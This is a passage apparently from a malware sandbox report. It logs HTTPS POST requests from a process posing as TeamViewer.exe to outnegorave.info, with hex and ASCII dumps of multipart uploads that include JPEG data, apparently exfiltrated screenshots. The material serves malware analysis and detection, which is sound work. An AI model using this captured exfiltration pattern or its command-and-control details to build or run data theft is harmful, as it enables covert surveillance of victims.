                                                                                                                                    2021-09-15 11:52:26 UTC1938OUTData Raw: 23 9f 2d b0 b2 8f e8 df a7 d2 99 e2 0f 87 1a 8d 86 e9 b4 a6 37 d0 0e 76 01 89 54 7d 3f 8b f0 e7 da ba 0f 08 f8 1b 43 36 b1 df 5c cb fd a3 21 ea 8c bb 52 36 ee a5 3a e4 77 0d f9 52 03 ca e6 8a 48 25 68 a7 8d e3 91 0e 19 1d 48 20 fb 83 4c ae 8f e2 12 24 7e 35 bf 48 d5 51 14 44 02 a8 c0 03 ca 4a e7 2a 84 15 6f 4d b2 6b eb a1 18 3b 50 72 ed e8 2a a5 74 1e 17 db 8b 90 7a fc bf 97 35 32 76 5a 11 52 a2 a6 b9 da bd 8d cb 3d 1a dc 26 cb 6b 31 26 d1 c9 29 b8 fe 35 5f 50 f0 e0 b8 56 11 da b4 33 0e 85 50 8f cc 56 e8 df fd 9b 6e 22 c9 8c 67 7e 3f bf 9e ff 00 86 2b 6f 4d f3 7e c2 9e 7e 77 64 ed dd d7 6f 6f eb 58 62 69 4a 86 1d 62 14 b5 ec 7a 30 c7 53 ad 3f 65 18 7b a7 8b 4d 13 c1 33 c5 2a 95 74 25 58 1e c6 99 5b 5e 31 f2 ff 00 e1 28 bd f2 b1 8d cb 9c 7a ed 19 fd 6b 16
                                                                                                                                    Data Ascii: #-7vT}?C6\!R6:wRH%hH L$~5HQDJ*oMk;Pr*tz52vZR=&k1&)5_PV3PVn"g~?+oM~~wdooXbiJbz0S?e{M3*t%X[^1(zk
                                                                                                                                    2021-09-15 11:52:26 UTC1941OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 33 37 39 30 32 38 32 36 33 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------1379028263--
                                                                                                                                    2021-09-15 11:52:26 UTC1941INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:26 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=5fa936f79854eb4b4dc2fe69418dee6c2d24a8cd9dfc26c22f7f77911b5ce4dc; expires=Thu, 15-Sep-2022 11:52:26 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wIhA98pGY%2Fh1W3NZXjCe6ghe0eG%2Bt3jbIc8pNoZnRgCwFJb0OvYkqCi6sfFQsBRe6kVnjU2qaA5NSSX7XPQwOQvpzOodkNnLJAU0sF3HiVNzg12LR49Mk5c2QNnYam%2F09TEf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a61c6b224eda-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:26 UTC1941INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    23192.168.2.549814172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:27 UTC1942OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84962
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------2355185848
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:27 UTC1942OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 33 35 35 31 38 35 38 34 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------2355185848Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:27 UTC1942OUTData Raw: 9b d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 67 14 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 cd c9 a7 51 fe d1 49 1a 5e c2 70 95 e1 35 5f 84 67
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^g;ZV}}h-^fcKQI^p5_g
                                                                                                                                    2021-09-15 11:52:27 UTC1942OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:52:27 UTC1958OUTData Raw: ce 32 7e 7e 33 5c 04 11 79 d3 2c 60 e3 3d eb aa f0 c6 ab 3f 87 16 eb ec e9 1c cd 71 b3 25 c1 c2 ed dd e8 7f da a5 28 4a 71 d0 a8 c9 27 a9 e9 bf 6b d4 7f e8 17 ff 00 93 0b 47 da f5 1f fa 05 ff 00 e4 c2 d7 09 37 8c f5 a9 3e e4 90 c3 fe e4 60 ff 00 3c d7 5f 71 2d 80 b8 94 3e ab 7a 8c 1c e5 55 9b 0a 73 d0 71 5c d5 29 4a 16 b9 bc 66 a5 b0 cb cb 4b 2d 66 ca f2 cf 5a 8e 38 0b 4a 0a 83 2a 96 43 b1 70 ca 7d 6b c8 f5 dd 22 6d 17 50 6b 69 64 49 53 ac 72 c6 72 ae be be c7 d4 7f fa eb d6 fc ed 3b fe 83 17 ff 00 f7 db 7f f1 35 cb 7c 53 2a 6d b4 42 8e ce a5 25 c3 37 56 18 8f 93 4e 94 9a 76 15 44 ad 73 cf 29 29 d8 14 98 ae 8b 18 09 45 2e 28 c1 a0 0d cf 05 ff 00 c8 dd a7 7f d7 5f e8 6b db 6b c4 bc 17 ff 00 23 76 9b ff 00 5d 7f a1 af 5c 92 11 73 ab 4c 92 c9 38 44 82 32 aa
                                                                                                                                    Data Ascii: 2~~3\y,`=?q%(Jq'kG7>`<_q->zUsq\)JfK-fZ8J*Cp}k"mPkidISrr;5|S*mB%7VNvDs))E.(_kk#v]\sL8D2
                                                                                                                                    2021-09-15 11:52:27 UTC1974OUTData Raw: 8d 69 cb a7 df 1e 5b 2d f8 d5 67 b3 b8 4e b1 35 6d 1a 89 f5 30 92 92 e8 55 f2 3d 58 52 f9 2a 3a b5 4a d1 48 bd 54 8f c2 9b b4 8e a2 b4 4d 19 b6 c6 f9 68 3d 4d 2e 14 7f 08 a2 96 9d 85 76 19 1d 80 14 b9 3e b4 94 b4 58 90 e7 d6 94 52 52 d0 21 68 a2 8a 40 28 a5 14 94 a2 93 25 8e 15 a3 65 8c 8c 56 70 ab f6 47 91 58 d5 5e e9 b6 1d fb e7 5a a7 1a 69 3f ec d7 9f 5d ff 00 ac 6f ad 77 b9 c6 92 c7 fd 9a e0 2e 8f ef 1b eb 5c b8 0d e4 7a 79 83 f8 0e a2 db fe 45 58 ff 00 cf 7a c8 7a d6 80 ff 00 c5 29 17 f9 ef 58 ce c7 35 54 16 b2 f5 30 c6 3d 23 e8 31 89 1d 0d 01 d8 74 63 49 9c d2 57 5d 8f 33 99 92 09 dc 77 cd 3b cf 07 ef 20 35 0d 14 b9 51 4a 6d 12 9f 21 be f2 62 90 db 40 dd 0e 2a 3a 28 b3 e8 c6 aa be a0 da 7a 9f ba c2 a2 6d 3e 41 d3 9a 9b 27 a8 35 22 c8 e3 f8 8d 17 92
                                                                                                                                    Data Ascii: i[-gN5m0U=XR*:JHTMh=M.v>XRR!h@(%eVpGX^Zi?]ow.\zyEXzz)X5T0=#1tcIW]3w; 5QJm!b@*:(zm>A'5"
                                                                                                                                    2021-09-15 11:52:27 UTC1990OUTData Raw: a6 01 45 14 b4 08 29 68 a3 14 c4 2d 2d 25 14 c4 06 94 52 52 8a 00 51 49 4a 29 0d 31 05 2d 25 02 90 0e 14 e1 4d a5 aa 42 62 d1 49 4b 4c 05 a2 8a 28 24 5a 28 a2 98 05 14 51 40 87 0a 5a 68 a5 14 d0 0b 4b 49 4b 4c 90 a5 a4 a5 14 c0 5a 28 a2 98 85 a2 92 96 81 05 2d 25 2d 34 03 a8 a4 14 b4 c9 0a 51 45 14 c0 5a 28 14 b4 c4 25 25 2d 14 00 83 ad 3e 98 3a d3 e8 40 c2 83 45 14 c9 01 4b 48 29 d8 a1 03 14 0a 75 36 9c 2a 91 2c 4e f4 b4 87 ad 38 53 01 05 3a 9b 4a 29 89 8b 45 14 50 20 14 b4 82 9d 4c 42 53 a9 28 a6 0c 75 2d 34 52 d3 24 76 69 45 36 94 53 42 63 85 2d 36 9c 29 92 c2 96 92 8a 62 16 8a 4a 5a 00 29 69 29 68 01 69 69 b4 ea 04 c2 94 52 52 d0 21 68 a4 a5 a0 41 4b 45 14 c0 29 45 14 a2 81 31 68 14 94 a2 81 1a 1a 48 fd fb 9f 44 35 58 f5 3f 5a b5 a4 ff 00 ae 93 fd d3
                                                                                                                                    Data Ascii: E)h--%RRQIJ)1-%MBbIKL($Z(Q@ZhKIKLZ(-%-4QEZ(%%->:@EKH)u6*,N8S:J)EP LBS(u-4R$viE6SBc-6)bJZ)i)hiiRR!hAKE)E1hHD5X?Z
                                                                                                                                    2021-09-15 11:52:27 UTC2006OUTData Raw: 92 96 98 0b 4b 4d a5 a0 43 85 14 94 b5 42 14 52 d3 73 4b 4c 43 b3 4b 4d a5 a0 43 85 28 a6 d2 83 54 99 2c 90 51 48 0d 15 48 91 69 69 28 cd 30 b0 b9 a3 34 82 96 8b 8a c2 8a 5c d3 29 73 4e e1 61 f9 a5 a6 66 97 34 c9 b0 e1 4b 9a 6e 68 a7 70 b0 fc d1 9a 6e 68 dd ed 45 c5 62 40 69 73 51 ee 3e b4 67 de 9d c5 62 4c 8a 33 51 e6 97 34 5c 56 1f 9a 33 4d cd 19 a7 70 b0 ea 5c d3 68 cd 17 15 87 66 97 34 cc d1 9a 77 0b 0f cd 19 a6 6e a4 dd 45 c3 94 93 34 66 a3 dd 46 ea 57 0e 52 4d d4 9b aa 22 f4 d2 f4 39 0d 40 98 b5 34 bd 44 5e 9a 5a a5 cc a5 02 52 f4 c2 f5 19 6a 61 6a 87 22 d4 09 0b fb d3 0b 53 0b 53 0b 54 39 1a 28 8f 2d 4c 2d 4d 2d 4c 2d 59 b9 1a 28 8e 26 98 4d 21 34 95 0d 96 90 a4 d2 52 51 9a 4c 76 10 d1 41 a6 d4 94 83 34 52 52 52 b8 ec 50 c7 7a 5a 4a 2b 94 eb 16 8a
                                                                                                                                    Data Ascii: KMCBRsKLCKMC(T,QHHii(04\)sNaf4KnhpnhEb@isQ>gbL3Q4\V3Mp\hf4wnE4fFWRM"9@4D^ZRjaj"SST9(-L-M-L-Y(&M!4RQLvA4RRRPzZJ+
                                                                                                                                    2021-09-15 11:52:27 UTC2022OUTData Raw: 59 ee 9b 48 93 ed b0 8e 7c b6 c2 ca 3f a3 7e 9f 4a 67 88 3e 1c 6a 36 1b a6 d2 98 df 40 39 d8 06 25 51 f4 fe 2f c3 9f 6a e8 3c 23 e0 6d 0c da c7 7d 73 2f f6 8c 87 aa 32 ed 48 db ba 94 eb 91 dc 37 e5 48 0f 2b 9a 29 20 95 a2 9e 37 8e 44 38 64 75 20 83 ee 0d 32 ba 3f 88 48 91 f8 d6 fd 23 55 44 51 10 0a a3 00 0f 29 2b 9c aa 10 55 bd 36 c9 af ae 84 60 ed 41 cb b7 a0 aa 95 d0 78 5f 6e 2e 41 eb f2 fe 5c d4 c9 d9 68 45 4a 8a 9a e7 6a f6 37 2c f4 6b 70 9b 2d ac c4 9b 47 24 a6 e3 f8 d5 7d 43 c3 82 e1 58 47 6a d0 cc 3a 15 42 3f 31 5b a3 7f f6 6d b8 8b 26 31 9d f8 fe fe 7b fe 18 ad bd 37 cd fb 0a 79 f9 dd 93 b7 77 5d bd bf ad 61 89 a5 2a 18 75 88 52 d7 b1 e8 c3 1d 4e b4 fd 94 61 ee 9e 2d 34 4f 04 cf 14 aa 55 d0 95 60 7b 1a 65 6d 78 c7 cb ff 00 84 a2 f7 ca c6 37 2e 71
                                                                                                                                    Data Ascii: YH|?~Jg>j6@9%Q/j<#m}s/2H7H+) 7D8du 2?H#UDQ)+U6`Ax_n.A\hEJj7,kp-G$}CXGj:B?1[m&1{7yw]a*uRNa-4OU`{emx7.q
                                                                                                                                    2021-09-15 11:52:27 UTC2025OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 33 35 35 31 38 35 38 34 38 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------2355185848--
                                                                                                                                    2021-09-15 11:52:27 UTC2025INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:27 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=94614511adbcc668b855c90be9b30e242ab8db0736c232d7022d84312ea1f682; expires=Thu, 15-Sep-2022 11:52:27 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NPIqWwt%2FK%2FNX7EfNK2XDFttuYMlpJi8CGIHoXWlsBZEIODuSpcItLspxkcd1yRH2JZ5eC0tnFASGF%2BtameOObz90tL%2FjmeKld8HvFNuMBkXdGEadTXBxODM8dKryWAZrhHIV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a622acf24e7f-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:27 UTC2026INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    24192.168.2.549815172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:28 UTC2026OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 85028
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------1302388111
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:28 UTC2026OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 33 30 32 33 38 38 31 31 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------1302388111Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:28 UTC2026OUTData Raw: b1 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 9b 15 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 9d bb fb 0f bd 80 17 0b 2b 94 2b f4 b7 66 1d b3 24 dd d1 5b ac c5 47 d8 09 b3 88 c4 ba 2e f6 a6 3a 2c 9c 8f 72 49 a7 8c 9e 60 9f bf d3 6c a7 bd c1 c6 2b ca 0d 24 15
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^;ZV}}h-^fcK++f$[G.:,rI`l+$
                                                                                                                                    2021-09-15 11:52:28 UTC2026OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:52:28 UTC2042OUTData Raw: 15 06 55 2c 87 62 e1 94 fa d7 91 eb ba 44 da 2e a0 d6 d2 c8 92 a7 58 e5 8c e5 5d 7d 7d 8f a8 ff 00 f5 d7 ad f9 da 77 fd 06 2f ff 00 ef b6 ff 00 e2 6b 96 f8 a6 54 db 68 85 1d 9d 4a 4b 86 6e ac 31 1f 26 9d 29 34 ec 2a 89 5a e7 9e 52 53 b0 29 31 5d 16 30 12 8a 5c 51 83 40 1b 9e 0b ff 00 91 bb 4e ff 00 ae bf d0 d7 b6 d7 89 78 2f fe 46 ed 37 fe ba ff 00 43 5e b9 24 22 e7 56 99 25 92 70 89 04 65 55 26 74 19 2d 26 4f ca 47 a0 fc ab 1a 8a f2 d4 d6 0e cb 43 46 aa de b6 c1 0b 95 66 55 93 9d aa 5b f8 58 74 1f 5a 85 6c ec de 57 89 2e 2e 5a 48 f1 bd 45 e4 b9 5c f4 cf cd 4f fe cd b7 ff 00 9e 97 7f f8 17 2f ff 00 15 59 da 3d ff 00 0f f8 25 de 5d bf 1f f8 07 9c f8 e7 43 b5 89 5f 55 b2 57 88 16 1e 6c 6d 13 28 24 9e a3 23 f4 ae 26 bd 4f c6 6e d2 7c 3d b7 79 18 b3 b0 80 b3
                                                                                                                                    Data Ascii: U,bD.X]}}w/kThJKn1&)4*ZRS)1]0\Q@Nx/F7C^$"V%peU&t-&OGCFfU[XtZlW..ZHE\O/Y=%]C_UWlm($#&On|=y
                                                                                                                                    2021-09-15 11:52:28 UTC2058OUTData Raw: 8f fb 35 c0 5d 1f de 37 d6 b9 70 1b c8 f4 f3 07 f0 1d 45 b7 fc 8a b1 ff 00 9e f5 90 f5 ad 01 ff 00 8a 52 2f f3 de b1 9d 8e 6a a8 2d 65 ea 61 8c 7a 47 d0 63 12 3a 1a 03 b0 e8 c6 93 39 a4 ae bb 1e 67 33 24 13 b8 ef 9a 77 9e 0f de 40 6a 1a 29 72 a2 94 da 25 3e 43 7d e4 c5 21 b6 81 ba 1c 54 74 51 67 d1 8d 55 7d 41 b4 f5 3f 75 85 44 da 7c 83 a7 35 36 4f 50 6a 45 91 c7 f1 1a 2f 24 5a 9a 33 da d6 55 ea a6 a3 31 b0 ea 0d 6c 09 5b b8 14 ed c8 7e f2 03 4f da 35 d0 d1 6b d4 c3 20 8e c6 92 b6 cc 36 ef d5 71 4c 36 10 b7 dd 6c 53 f6 a8 76 66 3d 15 a6 da 59 fe 16 06 a1 7d 3e 65 e8 b9 a6 aa 47 b8 59 94 e8 a9 9a da 55 ea 87 f2 a8 8a 30 ea 0d 5a 69 88 4a 28 c5 14 c0 29 69 28 a0 43 a9 73 4d a5 14 08 75 4f 7c 7f e2 9a 6f fa ea 2a b8 a9 af cf fc 53 4c 3f e9 b0 ac 31 1b 23 7c
                                                                                                                                    Data Ascii: 5]7pER/j-eazGc:9g3$w@j)r%>C}!TtQgU}A?uD|56OPjE/$Z3U1l[~O5k 6qL6lSvf=Y}>eGYU0ZiJ()i(CsMuO|o*SL?1#|
                                                                                                                                    2021-09-15 11:52:28 UTC2074OUTData Raw: 40 0b 45 25 2d 31 09 45 29 a4 a0 02 8a 28 a0 02 8a 28 a0 05 a4 a2 96 80 0a 28 a2 80 16 81 49 46 69 88 75 14 94 b4 c0 28 a2 96 81 05 2d 14 62 98 85 a5 a4 a2 98 80 d2 8a 4a 51 40 0a 29 29 45 21 a6 20 a5 a4 a0 52 01 c2 9c 29 b4 b5 48 4c 5a 29 29 69 80 b4 51 45 04 8b 45 14 53 00 a2 8a 28 10 e1 4b 4d 14 a2 9a 01 69 69 29 69 92 14 b4 94 a2 98 0b 45 14 53 10 b4 52 52 d0 20 a5 a4 a5 a6 80 75 14 82 96 99 21 4a 28 a2 98 0b 45 02 96 98 84 a4 a5 a2 80 10 75 a7 d3 07 5a 7d 08 18 50 68 a2 99 20 29 69 05 3b 14 20 62 81 4e a6 d3 85 52 25 89 de 96 90 f5 a7 0a 60 20 a7 53 69 45 31 31 68 a2 8a 04 02 96 90 53 a9 88 4a 75 25 14 c1 8e a5 a6 8a 5a 64 8e cd 28 a6 d2 8a 68 4c 70 a5 a6 d3 85 32 58 52 d2 51 4c 42 d1 49 4b 40 05 2d 25 2d 00 2d 2d 36 9d 40 98 52 8a 4a 5a 04 2d 14 94
                                                                                                                                    Data Ascii: @E%-1E)(((IFiu(-bJQ@))E! R)HLZ))iQEES(KMii)iESRR u!J(EuZ}Ph )i; bNR%` SiE11hSJu%Zd(hLp2XRQLBIK@-%---6@RJZ-
                                                                                                                                    2021-09-15 11:52:28 UTC2090OUTData Raw: 69 80 b4 52 52 d0 02 d1 49 4b 4c 42 d1 49 4b 40 85 a5 14 94 b4 c4 14 52 52 d3 01 69 69 b4 b4 08 70 a2 92 96 a8 42 8a 5a 6e 69 69 88 76 69 69 b4 b4 08 70 a5 14 da 50 6a 93 25 92 0a 29 01 a2 a9 12 2d 2d 25 19 a6 16 17 34 66 90 52 d1 71 58 51 4b 9a 65 2e 69 dc 2c 3f 34 b4 cc d2 e6 99 36 1c 29 73 4d cd 14 ee 16 1f 9a 33 4d cd 1b bd a8 b8 ac 48 0d 2e 6a 3d c7 d6 8c fb d3 b8 ac 49 91 46 6a 3c d2 e6 8b 8a c3 f3 46 69 b9 a3 34 ee 16 1d 4b 9a 6d 19 a2 e2 b0 ec d2 e6 99 9a 33 4e e1 61 f9 a3 34 cd d4 9b a8 b8 72 92 66 8c d4 7b a8 dd 4a e1 ca 49 ba 93 75 44 5e 9a 5e 87 21 a8 13 16 a6 97 a8 8b d3 4b 54 b9 94 a0 4a 5e 98 5e a3 2d 4c 2d 50 e4 5a 81 21 7f 7a 61 6a 61 6a 61 6a 87 23 45 11 e5 a9 85 a9 a5 a9 85 ab 37 23 45 11 c4 d3 09 a4 26 92 a1 b2 d2 14 9a 4a 4a 33 49 8e
                                                                                                                                    Data Ascii: iRRIKLBIK@RRiipBZniiviipPj%)--%4fRqXQKe.i,?46)sM3MH.j=IFj<Fi4Km3Na4rf{JIuD^^!KTJ^^-L-PZ!zajajaj#E7#E&JJ3I
                                                                                                                                    2021-09-15 11:52:28 UTC2106OUTData Raw: fe 9d 28 63 13 49 f8 65 a5 c1 6e df da 93 49 77 3b ae 32 8c 51 53 e9 8e 49 fa fe 55 cf 6b ff 00 0d 75 0b 3d d3 69 12 7d b6 11 cf 96 d8 59 47 f4 6f d3 e9 4c f1 07 c3 8d 46 c3 74 da 53 1b e8 07 3b 00 c4 aa 3e 9f c5 f8 73 ed 5d 07 84 7c 0d a1 9b 58 ef ae 65 fe d1 90 f5 46 5d a9 1b 77 52 9d 72 3b 86 fc a9 01 e5 73 45 24 12 b4 53 c6 f1 c8 87 0c 8e a4 10 7d c1 a6 57 47 f1 09 12 3f 1a df a4 6a a8 8a 22 01 54 60 01 e5 25 73 95 42 0a b7 a6 d9 35 f5 d0 8c 1d a8 39 76 f4 15 52 ba 0f 0b ed c5 c8 3d 7e 5f cb 9a 99 3b 2d 08 a9 51 53 5c ed 5e c6 e5 9e 8d 6e 13 65 b5 98 93 68 e4 94 dc 7f 1a af a8 78 70 5c 2b 08 ed 5a 19 87 42 a8 47 e6 2b 74 6f fe cd b7 11 64 c6 33 bf 1f df cf 7f c3 15 b7 a6 f9 bf 61 4f 3f 3b b2 76 ee eb b7 b7 f5 ac 31 34 a5 43 0e b1 0a 5a f6 3d 18 63 a9
                                                                                                                                    Data Ascii: (cIenIw;2QSIUku=i}YGoLFtS;>s]|XeF]wRr;sE$S}WG?j"T`%sB59vR=~_;-QS\^nehxp\+ZBG+tod3aO?;v14CZ=c
                                                                                                                                    2021-09-15 11:52:28 UTC2109OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 33 30 32 33 38 38 31 31 31 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------1302388111--
                                                                                                                                    2021-09-15 11:52:29 UTC2109INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:29 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=d56e7f77bc56cb3564f8d01640fe90a155ca970651939e9166f317e65bfc6cb3; expires=Thu, 15-Sep-2022 11:52:28 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
